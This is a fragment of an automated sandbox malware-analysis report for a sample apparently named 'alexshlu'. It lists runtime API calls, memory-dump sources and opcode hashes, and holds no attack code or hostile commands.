                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D11C8A19315167E67112771AD8FDAF7A5CDD563E87100229F50191102FE608E319EB2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002ACB31
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002ACB3B
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002ACB52
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002ACBAC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1383202999-0
                                                                                                                                                                                                                                        • Opcode ID: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction ID: c7467a72e1189cf3f15b4167dd46e397afb8495fddc2ed64d07252d0c82093dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11E131C2411A8BCB05EFA4D94A6BDB775AF46728F24480AE4116B381DF749E20CFA1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000), ref: 002C99E7
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?,?,002C2602,00000000), ref: 002C99F3
                                                                                                                                                                                                                                          • Part of subcall function 002C9A44: CloseHandle.KERNEL32(FFFFFFFE,002C9A03,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?,?), ref: 002C9A54
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 002C9A03
                                                                                                                                                                                                                                          • Part of subcall function 002C9A25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002C99C1,002C8EAC,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A38
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,002C8EBF,00000000,00000001,00000000,?,?,002C2CBC,?,00000000,00000000,?), ref: 002C9A18
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
• Instruction ID: e35fc91e9444392d0eff6c11106f426f5c0abec80b421251d47aeced970e5a62
• Opcode Fuzzy Hash: 4ce98d8e452c6a2f14363cbddeffb7941e50eb03784f5d3ea4a9f0364275641c
• Instruction Fuzzy Hash: 43F01C36811229BFCF226F91EC0CE893F66FB487A0F104515FE1D95160D6328DA0EB91
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 002AE5D9
• GetCurrentThreadId.KERNEL32 ref: 002AE5E8
• GetCurrentProcessId.KERNEL32 ref: 002AE5F1
• QueryPerformanceCounter.KERNEL32(?), ref: 002AE5FE
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
• Instruction ID: 2ce6224cc3061221171bd5515d8034012c840288d948b4fd6b76695db0f9873e
• Opcode Fuzzy Hash: 6908aec6b1052d9a570ecb49a48a929965c5ed32083dcbbc439ea004506730ef
• Instruction Fuzzy Hash: 2DF06274D1120DEFCB00DBB4D94999EBBF4FF1C204BA18996E412E7550E730AB449B51
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002BA251,?,?,00000000,00000000,00000000,?), ref: 002BA375
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 79a7fc3d7825dedc08a5e8ef239f1b3381193a4068c16fc924a6d36cba48ff39
• Instruction ID: 3fce51ac08676d8b331f2fe1afcf819fd9583961faab45f24444090a38eb7f15
• Opcode Fuzzy Hash: 79a7fc3d7825dedc08a5e8ef239f1b3381193a4068c16fc924a6d36cba48ff39
• Instruction Fuzzy Hash: 6F41883191020AEFCF15DF98CC85AEEBBB6BF08340F148099F90567221D375AA61DF52
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 002B9E33
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
• Opcode ID: ad9516d56ba157a61532a38ec507bf8c3716fb426b1c19eba8810173cd706cce
• Instruction ID: 11c25cb41012ab17e458cb0874ad5cd2a7c98e95c424e9941fe9e469cede6107
• Opcode Fuzzy Hash: ad9516d56ba157a61532a38ec507bf8c3716fb426b1c19eba8810173cd706cce
• Instruction Fuzzy Hash: 6431943282021A9BCF268F54C8449FA7BA9FF093A5B14815AFA9499121C377DCF1DB91
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: GetctypeLockitLockit::_std::_
• String ID: ios_base::badbit set
• API String ID: 2423992667-3882152299
• Opcode ID: 13db60fffc45737845740290ca746f6c6638da60a477b59e209dfb35cb30db0e
• Instruction ID: 443adecab8155a0d4194ba72d749553157e6a29570b1cf1e5f95b2f412795fa0
• Opcode Fuzzy Hash: 13db60fffc45737845740290ca746f6c6638da60a477b59e209dfb35cb30db0e
• Instruction Fuzzy Hash: 2631F5B19187848BE310DF29C85531BBBE4AFE5308F04491CF5884B242EB75E5A8CBD3
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
Similarity
• API ID: FreeLibrary
• String ID: Wu
• API String ID: 3664257935-4083010176
• Opcode ID: 6425bf85f61168730cf8aa86984bf8b6e917edd52b7c815baf6d9195e9542296
• Instruction ID: 85dcaa2462d9c45145e65ac06ae9ca42faece8067be7f15f26664216f34aa8a8
• Opcode Fuzzy Hash: 6425bf85f61168730cf8aa86984bf8b6e917edd52b7c815baf6d9195e9542296
• Instruction Fuzzy Hash: 48C002798005019BCE413FA1FC0AC1C3A22EF46F5A7010138F80192032EE3309A1BB6A